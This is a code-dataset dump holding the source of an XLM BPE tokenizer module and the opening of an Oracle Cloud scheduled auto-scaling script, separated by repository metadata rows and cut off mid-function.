return [self.cls_token_id] + token_ids + [self.sep_token_id]
def add_special_tokens_sentences_pair(self, token_ids_0, token_ids_1):
"""
Adds special tokens to a sequence pair for sequence classification tasks.
An XLM sequence pair has the following format: [CLS] A [SEP] B [SEP]
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
return cls + token_ids_0 + sep + token_ids_1 + sep
def save_vocabulary(self, save_directory):
"""Save the tokenizer vocabulary and merge files to a directory."""
if not os.path.isdir(save_directory):
logger.error("Vocabulary path ({}) should be a directory".format(save_directory))
return
vocab_file = os.path.join(save_directory, VOCAB_FILES_NAMES['vocab_file'])
merge_file = os.path.join(save_directory, VOCAB_FILES_NAMES['merges_file'])
with open(vocab_file, 'w', encoding='utf-8') as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning("Saving vocabulary to {}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!".format(merge_file))
index = token_index
writer.write(' '.join(bpe_tokens) + u'\n')
index += 1
return vocab_file, merge_file
| 44.142138 | 185 | 0.413558 |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import logging
import os
import re
import sys
import unicodedata
from io import open
import sacremoses as sm
from .tokenization_utils import PreTrainedTokenizer
from .tokenization_bert import BasicTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {
'vocab_file': 'vocab.json',
'merges_file': 'merges.txt',
}
PRETRAINED_VOCAB_FILES_MAP = {
'vocab_file':
{
'xlm-mlm-en-2048': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-en-2048-vocab.json",
'xlm-mlm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-vocab.json",
'xlm-mlm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-vocab.json",
'xlm-mlm-enro-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enro-1024-vocab.json",
'xlm-mlm-tlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-tlm-xnli15-1024-vocab.json",
'xlm-mlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-xnli15-1024-vocab.json",
'xlm-clm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-enfr-1024-vocab.json",
'xlm-clm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-ende-1024-vocab.json",
'xlm-mlm-17-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-17-1280-vocab.json",
'xlm-mlm-100-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-100-1280-vocab.json",
},
'merges_file':
{
'xlm-mlm-en-2048': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-en-2048-merges.txt",
'xlm-mlm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-merges.txt",
'xlm-mlm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-merges.txt",
'xlm-mlm-enro-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enro-1024-merges.txt",
'xlm-mlm-tlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-tlm-xnli15-1024-merges.txt",
'xlm-mlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-xnli15-1024-merges.txt",
'xlm-clm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-merges.txt",
'xlm-clm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-merges.txt",
'xlm-mlm-17-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-17-1280-merges.txt",
'xlm-mlm-100-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-100-1280-merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
'xlm-mlm-en-2048': 512,
'xlm-mlm-ende-1024': 512,
'xlm-mlm-enfr-1024': 512,
'xlm-mlm-enro-1024': 512,
'xlm-mlm-tlm-xnli15-1024': 512,
'xlm-mlm-xnli15-1024': 512,
'xlm-clm-enfr-1024': 512,
'xlm-clm-ende-1024': 512,
'xlm-mlm-17-1280': 512,
'xlm-mlm-100-1280': 512,
}
PRETRAINED_INIT_CONFIGURATION = {
'xlm-mlm-en-2048': {"do_lowercase_and_remove_accent": True},
'xlm-mlm-ende-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "de",
"1": "en"},
"lang2id": { "de": 0,
"en": 1 }},
'xlm-mlm-enfr-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "fr"},
"lang2id": { "en": 0,
"fr": 1 }},
'xlm-mlm-enro-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "ro"},
"lang2id": { "en": 0,
"ro": 1 }},
'xlm-mlm-tlm-xnli15-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "ar",
"1": "bg",
"2": "de",
"3": "el",
"4": "en",
"5": "es",
"6": "fr",
"7": "hi",
"8": "ru",
"9": "sw",
"10": "th",
"11": "tr",
"12": "ur",
"13": "vi",
"14": "zh"},
"lang2id": { "ar": 0,
"bg": 1,
"de": 2,
"el": 3,
"en": 4,
"es": 5,
"fr": 6,
"hi": 7,
"ru": 8,
"sw": 9,
"th": 10,
"tr": 11,
"ur": 12,
"vi": 13,
"zh": 14 }},
'xlm-mlm-xnli15-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "ar",
"1": "bg",
"2": "de",
"3": "el",
"4": "en",
"5": "es",
"6": "fr",
"7": "hi",
"8": "ru",
"9": "sw",
"10": "th",
"11": "tr",
"12": "ur",
"13": "vi",
"14": "zh"},
"lang2id": { "ar": 0,
"bg": 1,
"de": 2,
"el": 3,
"en": 4,
"es": 5,
"fr": 6,
"hi": 7,
"ru": 8,
"sw": 9,
"th": 10,
"tr": 11,
"ur": 12,
"vi": 13,
"zh": 14 }},
'xlm-clm-enfr-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "fr"},
"lang2id": { "en": 0,
"fr": 1 }},
'xlm-clm-ende-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "de",
"1": "en"},
"lang2id": { "de": 0,
"en": 1 }},
'xlm-mlm-17-1280': {"do_lowercase_and_remove_accent": False,
"id2lang": {
"0": "ar",
"1": "de",
"2": "en",
"3": "es",
"4": "fr",
"5": "hi",
"6": "it",
"7": "ja",
"8": "ko",
"9": "nl",
"10": "pl",
"11": "pt",
"12": "ru",
"13": "sv",
"14": "tr",
"15": "vi",
"16": "zh"
},
"lang2id": {
"ar": 0,
"de": 1,
"en": 2,
"es": 3,
"fr": 4,
"hi": 5,
"it": 6,
"ja": 7,
"ko": 8,
"nl": 9,
"pl": 10,
"pt": 11,
"ru": 12,
"sv": 13,
"tr": 14,
"vi": 15,
"zh": 16}},
'xlm-mlm-100-1280': {"do_lowercase_and_remove_accent": False,
"id2lang": {
"0": "af",
"1": "als",
"2": "am",
"3": "an",
"4": "ang",
"5": "ar",
"6": "arz",
"7": "ast",
"8": "az",
"9": "bar",
"10": "be",
"11": "bg",
"12": "bn",
"13": "br",
"14": "bs",
"15": "ca",
"16": "ceb",
"17": "ckb",
"18": "cs",
"19": "cy",
"20": "da",
"21": "de",
"22": "el",
"23": "en",
"24": "eo",
"25": "es",
"26": "et",
"27": "eu",
"28": "fa",
"29": "fi",
"30": "fr",
"31": "fy",
"32": "ga",
"33": "gan",
"34": "gl",
"35": "gu",
"36": "he",
"37": "hi",
"38": "hr",
"39": "hu",
"40": "hy",
"41": "ia",
"42": "id",
"43": "is",
"44": "it",
"45": "ja",
"46": "jv",
"47": "ka",
"48": "kk",
"49": "kn",
"50": "ko",
"51": "ku",
"52": "la",
"53": "lb",
"54": "lt",
"55": "lv",
"56": "mk",
"57": "ml",
"58": "mn",
"59": "mr",
"60": "ms",
"61": "my",
"62": "nds",
"63": "ne",
"64": "nl",
"65": "nn",
"66": "no",
"67": "oc",
"68": "pl",
"69": "pt",
"70": "ro",
"71": "ru",
"72": "scn",
"73": "sco",
"74": "sh",
"75": "si",
"76": "simple",
"77": "sk",
"78": "sl",
"79": "sq",
"80": "sr",
"81": "sv",
"82": "sw",
"83": "ta",
"84": "te",
"85": "th",
"86": "tl",
"87": "tr",
"88": "tt",
"89": "uk",
"90": "ur",
"91": "uz",
"92": "vi",
"93": "war",
"94": "wuu",
"95": "yi",
"96": "zh",
"97": "zh_classical",
"98": "zh_min_nan",
"99": "zh_yue"
},
"lang2id": {
"af": 0,
"als": 1,
"am": 2,
"an": 3,
"ang": 4,
"ar": 5,
"arz": 6,
"ast": 7,
"az": 8,
"bar": 9,
"be": 10,
"bg": 11,
"bn": 12,
"br": 13,
"bs": 14,
"ca": 15,
"ceb": 16,
"ckb": 17,
"cs": 18,
"cy": 19,
"da": 20,
"de": 21,
"el": 22,
"en": 23,
"eo": 24,
"es": 25,
"et": 26,
"eu": 27,
"fa": 28,
"fi": 29,
"fr": 30,
"fy": 31,
"ga": 32,
"gan": 33,
"gl": 34,
"gu": 35,
"he": 36,
"hi": 37,
"hr": 38,
"hu": 39,
"hy": 40,
"ia": 41,
"id": 42,
"is": 43,
"it": 44,
"ja": 45,
"jv": 46,
"ka": 47,
"kk": 48,
"kn": 49,
"ko": 50,
"ku": 51,
"la": 52,
"lb": 53,
"lt": 54,
"lv": 55,
"mk": 56,
"ml": 57,
"mn": 58,
"mr": 59,
"ms": 60,
"my": 61,
"nds": 62,
"ne": 63,
"nl": 64,
"nn": 65,
"no": 66,
"oc": 67,
"pl": 68,
"pt": 69,
"ro": 70,
"ru": 71,
"scn": 72,
"sco": 73,
"sh": 74,
"si": 75,
"simple": 76,
"sk": 77,
"sl": 78,
"sq": 79,
"sr": 80,
"sv": 81,
"sw": 82,
"ta": 83,
"te": 84,
"th": 85,
"tl": 86,
"tr": 87,
"tt": 88,
"uk": 89,
"ur": 90,
"uz": 91,
"vi": 92,
"war": 93,
"wuu": 94,
"yi": 95,
"zh": 96,
"zh_classical": 97,
"zh_min_nan": 98,
"zh_yue": 99
}},
}
def get_pairs(word):
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
def lowercase_and_remove_accent(text):
text = ' '.join(text)
text = text.lower()
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output).lower().split(' ')
def replace_unicode_punct(text):
text = text.replace(',', ',')
text = re.sub(r'。\s*', '. ', text)
text = text.replace('、', ',')
text = text.replace('”', '"')
text = text.replace('“', '"')
text = text.replace('∶', ':')
text = text.replace(':', ':')
text = text.replace('?', '?')
text = text.replace('《', '"')
text = text.replace('》', '"')
text = text.replace(')', ')')
text = text.replace('!', '!')
text = text.replace('(', '(')
text = text.replace(';', ';')
text = text.replace('1', '"')
text = text.replace('」', '"')
text = text.replace('「', '"')
text = text.replace('0', '0')
text = text.replace('3', '3')
text = text.replace('2', '2')
text = text.replace('5', '5')
text = text.replace('6', '6')
text = text.replace('9', '9')
text = text.replace('7', '7')
text = text.replace('8', '8')
text = text.replace('4', '4')
text = re.sub(r'.\s*', '. ', text)
text = text.replace('~', '~')
text = text.replace('’', '\'')
text = text.replace('…', '...')
text = text.replace('━', '-')
text = text.replace('〈', '<')
text = text.replace('〉', '>')
text = text.replace('【', '[')
text = text.replace('】', ']')
text = text.replace('%', '%')
return text
def remove_non_printing_char(text):
output = []
for char in text:
cat = unicodedata.category(char)
if cat.startswith('C'):
continue
output.append(char)
return "".join(output)
def romanian_preprocessing(text):
# https://github.com/rsennrich/wmt16-scripts/blob/master/preprocess/normalise-romanian.py
text = text.replace("\u015e", "\u0218").replace("\u015f", "\u0219")
text = text.replace("\u0162", "\u021a").replace("\u0163", "\u021b")
# https://github.com/rsennrich/wmt16-scripts/blob/master/preprocess/remove-diacritics.py
text = text.replace("\u0218", "S").replace("\u0219", "s") #s-comma
text = text.replace("\u021a", "T").replace("\u021b", "t") #t-comma
text = text.replace("\u0102", "A").replace("\u0103", "a")
text = text.replace("\u00C2", "A").replace("\u00E2", "a")
text = text.replace("\u00CE", "I").replace("\u00EE", "i")
return text
class XLMTokenizer(PreTrainedTokenizer):
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
def __init__(self, vocab_file, merges_file, unk_token="<unk>", bos_token="<s>",
sep_token="</s>", pad_token="<pad>", cls_token="</s>",
mask_token="<special1>", additional_special_tokens=["<special0>",
"<special1>", "<special2>", "<special3>", "<special4>", "<special5>",
"<special6>", "<special7>", "<special8>", "<special9>"],
lang2id=None, id2lang=None, do_lowercase_and_remove_accent=True,
**kwargs):
super(XLMTokenizer, self).__init__(unk_token=unk_token, bos_token=bos_token,
sep_token=sep_token, pad_token=pad_token,
cls_token=cls_token, mask_token=mask_token,
additional_special_tokens=additional_special_tokens,
**kwargs)
# cache of sm.MosesPunctNormalizer instance
self.cache_moses_punct_normalizer = dict()
# cache of sm.MosesTokenizer instance
self.cache_moses_tokenizer = dict()
self.lang_with_custom_tokenizer = set(['zh', 'th', 'ja'])
# True for current supported model (v1.2.0), False for XLM-17 & 100
self.do_lowercase_and_remove_accent = do_lowercase_and_remove_accent
self.lang2id = lang2id
self.id2lang = id2lang
if lang2id is not None and id2lang is not None:
assert len(lang2id) == len(id2lang)
self.ja_word_tokenizer = None
self.zh_word_tokenizer = None
self.encoder = json.load(open(vocab_file, encoding="utf-8"))
self.decoder = {v:k for k,v in self.encoder.items()}
merges = open(merges_file, encoding='utf-8').read().split('\n')[:-1]
merges = [tuple(merge.split()[:2]) for merge in merges]
self.bpe_ranks = dict(zip(merges, range(len(merges))))
self.cache = {}
def moses_punct_norm(self, text, lang):
if lang not in self.cache_moses_punct_normalizer:
punct_normalizer = sm.MosesPunctNormalizer(lang=lang)
self.cache_moses_punct_normalizer[lang] = punct_normalizer
else:
punct_normalizer = self.cache_moses_punct_normalizer[lang]
return punct_normalizer.normalize(text)
def moses_tokenize(self, text, lang):
if lang not in self.cache_moses_tokenizer:
moses_tokenizer = sm.MosesTokenizer(lang=lang)
self.cache_moses_tokenizer[lang] = moses_tokenizer
else:
moses_tokenizer = self.cache_moses_tokenizer[lang]
return moses_tokenizer.tokenize(text, return_str=False, escape=False)
def moses_pipeline(self, text, lang):
text = replace_unicode_punct(text)
text = self.moses_punct_norm(text, lang)
text = remove_non_printing_char(text)
return text
def ja_tokenize(self, text):
if self.ja_word_tokenizer is None:
try:
import Mykytea
self.ja_word_tokenizer = Mykytea.Mykytea('-model %s/local/share/kytea/model.bin' % os.path.expanduser('~'))
except (AttributeError, ImportError) as e:
logger.error("Make sure you install KyTea (https://github.com/neubig/kytea) and it's python wrapper (https://github.com/chezou/Mykytea-python) with the following steps")
logger.error("1. git clone git@github.com:neubig/kytea.git && cd kytea")
logger.error("2. autoreconf -i")
logger.error("3. ./configure --prefix=$HOME/local")
logger.error("4. make && make install")
logger.error("5. pip install kytea")
raise e
return list(self.ja_word_tokenizer.getWS(text))
@property
def vocab_size(self):
return len(self.encoder)
def bpe(self, token):
word = tuple(token[:-1]) + (token[-1] + '</w>',)
if token in self.cache:
return self.cache[token]
pairs = get_pairs(word)
if not pairs:
return token+'</w>'
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float('inf')))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
new_word.extend(word[i:j])
i = j
except:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word)-1 and word[i+1] == second:
new_word.append(first+second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = ' '.join(word)
if word == '\n </w>':
word = '\n</w>'
self.cache[token] = word
return word
def _tokenize(self, text, lang='en', bypass_tokenizer=False):
if lang and self.lang2id and lang not in self.lang2id:
logger.error("Supplied language code not found in lang2id mapping. Please check that your language is supported by the loaded pretrained model.")
if bypass_tokenizer:
text = text.split()
elif lang not in self.lang_with_custom_tokenizer:
text = self.moses_pipeline(text, lang=lang)
# TODO: make sure we are using `xlm-mlm-enro-1024`, since XLM-100 doesn't have this step
if lang == 'ro':
text = romanian_preprocessing(text)
text = self.moses_tokenize(text, lang=lang)
elif lang == 'th':
text = self.moses_pipeline(text, lang=lang)
try:
if 'pythainlp' not in sys.modules:
from pythainlp.tokenize import word_tokenize as th_word_tokenize
else:
th_word_tokenize = sys.modules['pythainlp'].word_tokenize
except (AttributeError, ImportError) as e:
logger.error("Make sure you install PyThaiNLP (https://github.com/PyThaiNLP/pythainlp) with the following steps")
logger.error("1. pip install pythainlp")
raise e
text = th_word_tokenize(text)
elif lang == 'zh':
try:
if 'jieba' not in sys.modules:
import jieba
else:
jieba = sys.modules['jieba']
except (AttributeError, ImportError) as e:
logger.error("Make sure you install Jieba (https://github.com/fxsjy/jieba) with the following steps")
logger.error("1. pip install jieba")
raise e
text = ' '.join(jieba.cut(text))
text = self.moses_pipeline(text, lang=lang)
text = text.split()
elif lang == 'ja':
text = self.moses_pipeline(text, lang=lang)
text = self.ja_tokenize(text)
else:
raise ValueError('It should not reach here')
if self.do_lowercase_and_remove_accent and not bypass_tokenizer:
text = lowercase_and_remove_accent(text)
split_tokens = []
for token in text:
if token:
split_tokens.extend([t for t in self.bpe(token).split(' ')])
return split_tokens
def _convert_token_to_id(self, token):
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
return self.decoder.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens):
out_string = ''.join(tokens).replace('</w>', ' ').strip()
return out_string
def add_special_tokens_single_sentence(self, token_ids):
return [self.cls_token_id] + token_ids + [self.sep_token_id]
def add_special_tokens_sentences_pair(self, token_ids_0, token_ids_1):
sep = [self.sep_token_id]
cls = [self.cls_token_id]
return cls + token_ids_0 + sep + token_ids_1 + sep
def save_vocabulary(self, save_directory):
if not os.path.isdir(save_directory):
logger.error("Vocabulary path ({}) should be a directory".format(save_directory))
return
vocab_file = os.path.join(save_directory, VOCAB_FILES_NAMES['vocab_file'])
merge_file = os.path.join(save_directory, VOCAB_FILES_NAMES['merges_file'])
with open(vocab_file, 'w', encoding='utf-8') as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning("Saving vocabulary to {}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!".format(merge_file))
index = token_index
writer.write(' '.join(bpe_tokens) + u'\n')
index += 1
return vocab_file, merge_file
| true | true |
f72314b5ed81d84350466ae17742bdd5ed9d6af1 | 115,105 | py | Python | AutoScaleALL.py | TheDosah/AutoScale | 8975513d770fdff06c376ad17297cd7bcc63030c | [
"UPL-1.0"
] | null | null | null | AutoScaleALL.py | TheDosah/AutoScale | 8975513d770fdff06c376ad17297cd7bcc63030c | [
"UPL-1.0"
] | null | null | null | AutoScaleALL.py | TheDosah/AutoScale | 8975513d770fdff06c376ad17297cd7bcc63030c | [
"UPL-1.0"
] | null | null | null | #!/home/opc/py36env/bin/python
#################################################################################################################
# OCI - Scheduled Auto Scaling Script
# Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl
#
# Written by: Richard Garsthagen
# Contributors: Joel Nation
# Contributors: Adi Zohar
#################################################################################################################
# Application Command line parameters
#
# -t config - Config file section to use (tenancy profile)
# -ip - Use Instance Principals for Authentication
# -dt - Use Instance Principals with delegation token for cloud shell
# -a - Action - All,Up,Down
# -tag - Tag - Default Schedule
# -rg - Filter on Region
# -ic - include compartment ocid
# -ec - exclude compartment ocid
# -ignrtime - ignore region time zone
# -ignormysql- ignore mysql execution
# -printocid - print ocid of object
# -topic - topic to sent summary
# -h - help
#
#################################################################################################################
import oci
import datetime
import calendar
import threading
import time
import sys
import argparse
import os
import logging
# You can modify / translate the tag names used by this script - case sensitive!!!
AnyDay = "AnyDay"
Weekend = "Weekend"
WeekDay = "WeekDay"
Version = "2022.02.03"
# ============== CONFIGURE THIS SECTION ======================
# OCI Configuration
# ============================================================
ComputeShutdownMethod = "SOFTSTOP"
LogLevel = "ALL" # Use ALL or ERRORS. When set to ERRORS only a notification will be published if error occurs
TopicID = "" # Enter Topic OCID if you want the script to publish a message about the scaling actions
AlternativeWeekend = False # Set to True is your weekend is Friday/Saturday
RateLimitDelay = 2 # Time in seconds to wait before retry of operation
##########################################################################
# Get current host time and utc on execution
##########################################################################
current_host_time = datetime.datetime.today()
current_utc_time = datetime.datetime.utcnow()
##########################################################################
# Print header centered
##########################################################################
def print_header(name):
chars = int(90)
MakeOut("")
MakeOut('#' * chars)
MakeOut("#" + name.center(chars - 2, " ") + "#")
MakeOut('#' * chars)
##########################################################################
# Get Current Hour per the region
##########################################################################
def get_current_hour(region, ignore_region_time=False):
if region[:2] == 'eu':
timezdiff = 2
elif region[:2] == 'uk':
timezdiff = 0
elif region == 'af-johannesburg-1':
timezdiff = 2
elif region == 'ap-chiyoda-1':
timezdiff = 9
elif region == 'ap-chuncheon-1':
timezdiff = 9
elif region == 'ap-hyderabad-1':
timezdiff = 5.5
elif region == 'ap-melbourne-1':
timezdiff = 10
elif region == 'ap-mumbai-1':
timezdiff = 5.5
elif region == 'ap-osaka-1':
timezdiff = 9
elif region == 'ap-seoul-1':
timezdiff = 9
elif region == 'ap-singapore-1':
timezdiff = 8
elif region == 'ap-sydney-1':
timezdiff = 10
elif region == 'ap-tokyo-1':
timezdiff = 9
elif region == 'ca-montreal-1':
timezdiff = -4
elif region == 'ca-toronto-1':
timezdiff = -4
elif region == 'il-jerusalem-1':
timezdiff = 3
elif region == 'me-abudhabi-1':
timezdiff = 4
elif region == 'me-dubai-1':
timezdiff = 4
elif region == 'me-jeddah-1':
timezdiff = 3
elif region == 'sa-santiago-1':
timezdiff = -4
elif region == 'sa-saopaulo-1':
timezdiff = -3
elif region == 'sa-vinhedo-1':
timezdiff = -3
elif region == 'us-ashburn-1':
timezdiff = -4
elif region == 'us-gov-ashburn-1':
timezdiff = -4
elif region == 'us-gov-chicago-1':
timezdiff = -5
elif region == 'us-gov-fortworth-1':
timezdiff = -5
elif region == 'us-gov-fortworth-2':
timezdiff = -5
elif region == 'us-gov-phoenix-1':
timezdiff = -7
elif region == 'us-gov-sterling-1 ':
timezdiff = -4
elif region == 'us-gov-sterling-2':
timezdiff = -4
elif region == 'us-langley-1':
timezdiff = -5
elif region == 'us-luke-1':
timezdiff = -7
elif region == 'us-phoenix-1':
timezdiff = -7
elif region == 'us-sanjose-1':
timezdiff = -7
else:
timezdiff = 0
# Get current host time
current_time = current_host_time
# if need to use region time
if not ignore_region_time:
current_time = current_utc_time + datetime.timedelta(hours=timezdiff)
# get the variables to return
iDayOfWeek = current_time.weekday() # Day of week as a number
iDay = calendar.day_name[iDayOfWeek] # Day of week as string
iCurrentHour = current_time.hour
return iDayOfWeek, iDay, iCurrentHour
##########################################################################
# Create signer for Authentication
# Input - config_profile and is_instance_principals and is_delegation_token
# Output - config and signer objects
##########################################################################
def create_signer(config_profile, is_instance_principals, is_delegation_token):
# if instance principals authentications
if is_instance_principals:
try:
signer = oci.auth.signers.InstancePrincipalsSecurityTokenSigner()
config = {'region': signer.region, 'tenancy': signer.tenancy_id}
return config, signer
except Exception:
print_header("Error obtaining instance principals certificate, aborting")
raise SystemExit
# -----------------------------
# Delegation Token
# -----------------------------
elif is_delegation_token:
try:
# check if env variables OCI_CONFIG_FILE, OCI_CONFIG_PROFILE exist and use them
env_config_file = os.environ.get('OCI_CONFIG_FILE')
env_config_section = os.environ.get('OCI_CONFIG_PROFILE')
# check if file exist
if env_config_file is None or env_config_section is None:
MakeOut("*** OCI_CONFIG_FILE and OCI_CONFIG_PROFILE env variables not found, abort. ***")
MakeOut("")
raise SystemExit
config = oci.config.from_file(env_config_file, env_config_section)
delegation_token_location = config["delegation_token_file"]
with open(delegation_token_location, 'r') as delegation_token_file:
delegation_token = delegation_token_file.read().strip()
# get signer from delegation token
signer = oci.auth.signers.InstancePrincipalsDelegationTokenSigner(delegation_token=delegation_token)
return config, signer
except KeyError:
MakeOut("* Key Error obtaining delegation_token_file")
raise SystemExit
except Exception:
raise
# -----------------------------
# config file authentication
# -----------------------------
else:
config = oci.config.from_file(
oci.config.DEFAULT_LOCATION,
(config_profile if config_profile else oci.config.DEFAULT_PROFILE)
)
signer = oci.signer.Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=oci.config.get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
return config, signer
##########################################################################
# Configure logging output
##########################################################################
def MakeOut(msg, no_end=False):
logging.basicConfig(filename='log.out', format='%(asctime)s %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')
logging.warning(msg)
def MakeLog(msg, no_end=False):
file_path = 'log.log'
sys.stdout = open(file_path, "w")
print(datetime.datetime.today().strftime('%d/%m/%Y %I:%M:%S.%f %p') + "\t" + msg)
##########################################################################
# isWeekDay
##########################################################################
def isWeekDay(day):
weekday = True
if AlternativeWeekend:
if day == 4 or day == 5:
weekday = False
else:
if day == 5 or day == 6:
weekday = False
return weekday
###############################################
# isDeleted
###############################################
def isDeleted(state):
deleted = False
try:
if state == "TERMINATED" or state == "TERMINATING":
deleted = True
if state == "DELETED" or state == "DELETING":
deleted = True
except Exception:
deleted = True
MakeOut("No lifecyclestate found, ignoring resource")
MakeOut(state)
return deleted
###############################################
# AutonomousThread
###############################################
class AutonomousThread(threading.Thread):
def __init__(self, threadID, ID, NAME, CPU):
threading.Thread.__init__(self)
self.threadID = threadID
self.ID = ID
self.NAME = NAME
self.CPU = CPU
def run(self):
global total_resources
global ErrorsFound
global errors
global success
MakeOut(" - Starting Autonomous DB {} and after that scaling to {} cpus".format(self.NAME, self.CPU))
Retry = True
while Retry:
try:
response = database.start_autonomous_database(autonomous_database_id=self.ID)
Retry = False
success.append("Started Autonomous DB {}".format(self.NAME))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Starting Autonomous DB {}".format(response.status, self.NAME))
Retry = False
response = database.get_autonomous_database(autonomous_database_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
time.sleep(10)
while response.data.lifecycle_state != "AVAILABLE":
response = database.get_autonomous_database(autonomous_database_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
time.sleep(10)
MakeOut("Autonomous DB {} started, re-scaling to {} cpus".format(self.NAME, self.CPU))
dbupdate = oci.database.models.UpdateAutonomousDatabaseDetails()
dbupdate.cpu_core_count = self.CPU
Retry = True
while Retry:
try:
response = database.update_autonomous_database(autonomous_database_id=self.ID, update_autonomous_database_details=dbupdate)
Retry = False
success.append("Autonomous DB {} started, re-scaling to {} cpus".format(self.NAME, self.CPU))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
errors.append(" - Error ({}) re-scaling to {} cpus for {}".format(response.status, self.CPU, self.NAME))
Retry = False
###############################################
# PoolThread
###############################################
class PoolThread(threading.Thread):
def __init__(self, threadID, ID, NAME, INSTANCES):
threading.Thread.__init__(self)
self.threadID = threadID
self.ID = ID
self.NAME = NAME
self.INSTANCES = INSTANCES
def run(self):
global total_resources
global ErrorsFound
global errors
global success
MakeOut(" - Starting Instance Pool {} and after that scaling to {} instances".format(self.NAME, self.INSTANCES))
Retry = True
while Retry:
try:
response = pool.start_instance_pool(instance_pool_id=self.ID)
Retry = False
success.append(" - Starting Instance Pool {}".format(self.NAME))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
errors.append(" - Error ({}) starting instance pool {}".format(response.status, self.NAME))
Retry = False
response = pool.get_instance_pool(instance_pool_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
time.sleep(10)
while response.data.lifecycle_state != "RUNNING":
response = pool.get_instance_pool(instance_pool_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
time.sleep(10)
MakeOut("Instance pool {} started, re-scaling to {} instances".format(self.NAME, self.INSTANCES))
pooldetails = oci.core.models.UpdateInstancePoolDetails()
pooldetails.size = self.INSTANCES
Retry = True
while Retry:
try:
response = pool.update_instance_pool(instance_pool_id=self.ID, update_instance_pool_details=pooldetails)
Retry = False
success.append("Rescaling Instance Pool {} to {} instances".format(self.NAME, self.INSTANCES))
except oci.exceptions.ServiceError as response:
if response.status == 429:
